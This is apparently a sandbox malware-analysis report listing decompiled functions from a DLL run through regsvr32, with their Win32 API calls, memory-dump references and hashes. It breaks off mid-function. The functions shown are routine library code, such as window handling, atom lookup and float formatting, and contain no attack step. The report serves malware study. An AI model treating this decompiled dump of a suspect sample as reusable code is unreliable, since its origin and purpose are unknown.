                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1002962B(void* __ecx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t11;
                                                                                                                				int _t13;
                                                                                                                				void* _t23;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t23 = __ecx;
                                                                                                                				if(E10009F14(__eflags, 0x10) == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t30 = E100295EC(_t9);
                                                                                                                				}
                                                                                                                				_t11 = GetCurrentProcess();
                                                                                                                				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                                                                                                                				_t34 = _t32;
                                                                                                                				if(_t13 == 0) {
                                                                                                                					if(_t30 != 0) {
                                                                                                                						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                                                                					}
                                                                                                                					E10034B40(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                                                                				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                                                                				return _t30;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1002965D
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10029663
                                                                                                                • DuplicateHandle.KERNEL32 ref: 10029666
                                                                                                                • GetLastError.KERNEL32(?), ref: 10029681
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3704204646-0
                                                                                                                • Opcode ID: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
                                                                                                                • Instruction ID: 9a57ea4cd7946a0c25813fde5557cbd385d6f7a6745eee91706822166a40c99e
                                                                                                                • Opcode Fuzzy Hash: 9b6f9dd5f042a9076f42e54c988969725293ae68f806c768e483a8899852132f
                                                                                                                • Instruction Fuzzy Hash: 9C018F75700200BFEB11DBA5DD89F9ABBE9EF84790F148465FA05CB251DBB1EC008B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E100220CD(intOrPtr __edi, intOrPtr __esi, int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v264;
                                                                                                                				void* __ebx;
                                                                                                                				signed int _t7;
                                                                                                                				long _t11;
                                                                                                                				intOrPtr _t13;
                                                                                                                				long _t17;
                                                                                                                				intOrPtr _t22;
                                                                                                                				signed int _t27;
                                                                                                                
                                                                                                                				_t25 = __esi;
                                                                                                                				_t23 = __edi;
                                                                                                                				_t7 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t7 ^ _t27;
                                                                                                                				if(GetAtomNameA(_a4,  &_v264, 0x100) == 0) {
                                                                                                                					_push(__esi);
                                                                                                                					_push(__edi);
                                                                                                                					_t11 = GetLastError();
                                                                                                                					if(_t11 == 0x7a || _t11 == 0xea || GlobalGetAtomNameA(_a4,  &_v264, 0x100) != 0) {
                                                                                                                						L8:
                                                                                                                						_t13 = 1;
                                                                                                                					} else {
                                                                                                                						_t17 = GetLastError();
                                                                                                                						if(_t17 == 0x7a || _t17 == 0xea) {
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							_t13 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_pop(_t23);
                                                                                                                					_pop(_t25);
                                                                                                                				} else {
                                                                                                                					_t13 = 1;
                                                                                                                				}
                                                                                                                				return E1004763E(_t13, 0x100, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetAtomNameA.KERNEL32(?,?,00000100), ref: 100220F1
                                                                                                                • GetLastError.KERNEL32 ref: 10022108
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000100), ref: 10022123
                                                                                                                • GetLastError.KERNEL32 ref: 1002212D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AtomErrorLastName$Global
                                                                                                                • String ID:
                                                                                                                • API String ID: 815022922-0
                                                                                                                • Opcode ID: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
                                                                                                                • Instruction ID: ee492f502a4a9a34b43089ee40036339920e4bf53d98a0481bb42db3b440c012
                                                                                                                • Opcode Fuzzy Hash: 3b690f861f08e89ab78d91b88308261db9ccfc801dcf7cd75de277a0a491c9aa
                                                                                                                • Instruction Fuzzy Hash: 65018671B00114BBEB11DBB4EDC0EEE77EDDB1A340F6008B2EA46D2150EA74DD919761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10046149(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __edi;
                                                                                                                				struct tagPOINT* _t8;
                                                                                                                				struct HWND__* _t9;
                                                                                                                				int _t14;
                                                                                                                				long _t19;
                                                                                                                				void* _t20;
                                                                                                                				struct HWND__* _t22;
                                                                                                                				struct HWND__* _t23;
                                                                                                                				struct HWND__* _t26;
                                                                                                                
                                                                                                                				_t20 = __edx;
                                                                                                                				_t8 = _a8;
                                                                                                                				_v12.x = _t8->x;
                                                                                                                				_t19 = _t8->y;
                                                                                                                				_push(_t19);
                                                                                                                				_v12.y = _t19;
                                                                                                                				_t9 = WindowFromPoint( *_t8);
                                                                                                                				_t26 = _t9;
                                                                                                                				if(_t26 != 0) {
                                                                                                                					_t22 = GetParent(_t26);
                                                                                                                					if(_t22 == 0 || E10021BD1(__ebx, _t20, _t22, _t22, 2) == 0) {
                                                                                                                						ScreenToClient(_t26,  &_v12);
                                                                                                                						_t23 = E10021C73(_t26, _v12.x, _v12.y);
                                                                                                                						if(_t23 == 0) {
                                                                                                                							L6:
                                                                                                                							_t9 = _t26;
                                                                                                                						} else {
                                                                                                                							_t14 = IsWindowEnabled(_t23);
                                                                                                                							_t9 = _t23;
                                                                                                                							if(_t14 != 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t9 = _t22;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • WindowFromPoint.USER32 ref: 10046160
                                                                                                                • GetParent.USER32(00000000), ref: 1004616E
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 1004618F
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 100461A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871804413-0
                                                                                                                • Opcode ID: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
                                                                                                                • Instruction ID: 1f6c813ac5b2d9a8c95957f1ec1c8b9de4531536b4a4b6380d21aba485b11546
                                                                                                                • Opcode Fuzzy Hash: 3627c711615e78e19aad3e618d6517063d8300fb1da98c20ae8f7686f437bd5c
                                                                                                                • Instruction Fuzzy Hash: 4101A779600511FFD706DB588D44DEE76B9EF8EA80B244165F901D3321FB30DD019BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10010CBC(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* _t16;
                                                                                                                				int _t17;
                                                                                                                				int _t18;
                                                                                                                				struct HWND__* _t19;
                                                                                                                				intOrPtr _t25;
                                                                                                                				intOrPtr _t33;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t32 = __edi;
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                				if(_t25 == 0) {
                                                                                                                					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L3:
                                                                                                                						_t17 = E1000A069(0, _t25, _t32, _t35, _t39);
                                                                                                                						L4:
                                                                                                                						asm("sbb edx, edx");
                                                                                                                						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                                						L11:
                                                                                                                						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                                						return _t18;
                                                                                                                					}
                                                                                                                					__eflags = _a4;
                                                                                                                					if(_a4 == 0) {
                                                                                                                						_push(__edi);
                                                                                                                						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                						_t19 = GetFocus();
                                                                                                                						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                                						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                                							SendMessageA( *(E10013FEA(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t18 = E10017979( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                                					_t17 =  *(__ecx + 8);
                                                                                                                					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}












                                                                                                                0x10010d48

                                                                                                                APIs
                                                                                                                • EnableMenuItem.USER32 ref: 10010CF4
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetFocus.USER32 ref: 10010D0B
                                                                                                                • GetParent.USER32(?), ref: 10010D19
                                                                                                                • SendMessageA.USER32 ref: 10010D2C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3849708097-0
                                                                                                                • Opcode ID: 4919a6fd22bf5e50338a9fd7e625461db986646a5d6a2b2f2164b2a6910778ce
                                                                                                                • Instruction ID: 9069f4e229311afcb2c565f3bfcfa1c745c4456fe6fca2b243d7b8774c268526
                                                                                                                • Opcode Fuzzy Hash: 4919a6fd22bf5e50338a9fd7e625461db986646a5d6a2b2f2164b2a6910778ce
                                                                                                                • Instruction Fuzzy Hash: 38118EB1600601EFD720DFA0DD8485AB7F6FF89355B11CA6EF1865A860C771EC84CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10014BE6(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t18;
                                                                                                                				struct HWND__* _t20;
                                                                                                                				void* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t24;
                                                                                                                				struct HWND__* _t25;
                                                                                                                
                                                                                                                				_t23 = __ecx;
                                                                                                                				_t22 = __ebx;
                                                                                                                				_t24 = GetTopWindow;
                                                                                                                				_t16 = GetTopWindow(_a4);
                                                                                                                				while(1) {
                                                                                                                					_t25 = _t16;
                                                                                                                					if(_t25 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					__eflags = _a24;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                                					} else {
                                                                                                                						_t20 = E10014011(_t23, _t24, _t25, __eflags, _t25);
                                                                                                                						__eflags = _t20;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_push(_a16);
                                                                                                                							_push(_a12);
                                                                                                                							_push(_a8);
                                                                                                                							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                                							_push(_t20);
                                                                                                                							E100148DA(_t22, _t24, _t25, __eflags);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _a20;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						_t18 = GetTopWindow(_t25);
                                                                                                                						__eflags = _t18;
                                                                                                                						if(_t18 != 0) {
                                                                                                                							E10014BE6(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t16 = GetWindow(_t25, 2);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(?), ref: 10014BF4
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10014C33
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 10014C51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2353593579-0
                                                                                                                • Opcode ID: ddba00b5ca7abc94cbf5f1532f6a01e3883fcc557cee0555f5c466dad4639b0a
                                                                                                                • Instruction ID: 12706a1207a9f1066db5140d4dbce69f4368895b0ea893ea0a3511bb130aeacf
                                                                                                                • Opcode Fuzzy Hash: ddba00b5ca7abc94cbf5f1532f6a01e3883fcc557cee0555f5c466dad4639b0a
                                                                                                                • Instruction Fuzzy Hash: DA01293600252AFBDF529F908E04EDF3A6AEF49391F024010FA1459031CB76C9A2EBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10055DC6(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                				intOrPtr _t25;
                                                                                                                				void* _t26;
                                                                                                                				void* _t28;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 = __ebx;
                                                                                                                				_t25 = _a16;
                                                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                					_t26 = E1005566C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_t35 = _t25 - 0x66;
                                                                                                                					if(_t25 != 0x66) {
                                                                                                                						__eflags = _t25 - 0x61;
                                                                                                                						if(_t25 == 0x61) {
                                                                                                                							L7:
                                                                                                                							_t26 = E10055758(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                						} else {
                                                                                                                							__eflags = _t25 - 0x41;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t26 = E10055CB0(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L9:
                                                                                                                						return _t26;
                                                                                                                					} else {
                                                                                                                						return E10055BDC(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
                                                                                                                • Instruction ID: 600500aa65ffc26479830b01431e16f35ac0bba730854e645dd73247cfad11b1
                                                                                                                • Opcode Fuzzy Hash: f21a8b7f24a1b2d00343f0b603ae94f06ec36108a82eb02af9b45acdd94f1f67
                                                                                                                • Instruction Fuzzy Hash: 3E014B3641014ABBCF169E84DC228EE3F62FB08296F558415FA5899131D337DAB9AB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10014367(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t9;
                                                                                                                				struct HWND__* _t10;
                                                                                                                				void* _t14;
                                                                                                                				void* _t15;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t17;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t14 = __ecx;
                                                                                                                				_t13 = __ebx;
                                                                                                                				_t9 = GetDlgItem(_a4, _a8);
                                                                                                                				_t15 = GetTopWindow;
                                                                                                                				_t16 = _t9;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					L6:
                                                                                                                					_t10 = GetTopWindow(_a4);
                                                                                                                					while(1) {
                                                                                                                						_t17 = _t10;
                                                                                                                						__eflags = _t17;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						_t10 = E10014367(_t13, _t14, _t17, _a8, _a12);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 == 0) {
                                                                                                                							_t10 = GetWindow(_t17, 2);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(GetTopWindow(_t16) == 0) {
                                                                                                                						L3:
                                                                                                                						_push(_t16);
                                                                                                                						if(_a12 == 0) {
                                                                                                                							return E10013FEA(_t13, _t14, _t18);
                                                                                                                						}
                                                                                                                						_t10 = E10014011(_t14, _t15, _t16, __eflags);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 == 0) {
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t10 = E10014367(__ebx, _t14, _t16, _a8, _a12);
                                                                                                                						if(_t10 == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10:
                                                                                                                				return _t10;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 10014372
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10014385
                                                                                                                  • Part of subcall function 10014367: GetWindow.USER32(00000000,00000002), ref: 100143CC
                                                                                                                • GetTopWindow.USER32(?), ref: 100143B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 369458955-0
                                                                                                                • Opcode ID: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
                                                                                                                • Instruction ID: 28477358267bbdc3cbc80c072941f90239b0d5c24e60e747c360d6ea668f4f31
                                                                                                                • Opcode Fuzzy Hash: ac0814051f65bb9e564b276aa6b1d9ae16531019888a838dddd7f9f351e01bee
                                                                                                                • Instruction Fuzzy Hash: 82016D36401667B7DB279FA18D04E8E3A99EF453E0F434020FD24AD130EF71DBA196A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E10020BB6(short* _a4) {
                                                                                                                				char* _v0;
                                                                                                                				int _v8;
                                                                                                                				int _v16;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t6;
                                                                                                                				char* _t7;
                                                                                                                				void* _t12;
                                                                                                                				char* _t13;
                                                                                                                				void* _t15;
                                                                                                                				void* _t16;
                                                                                                                				short* _t20;
                                                                                                                
                                                                                                                				_t20 = _a4;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					__imp__#7(_t20, _t16, _t12);
                                                                                                                					_v8 = _t6;
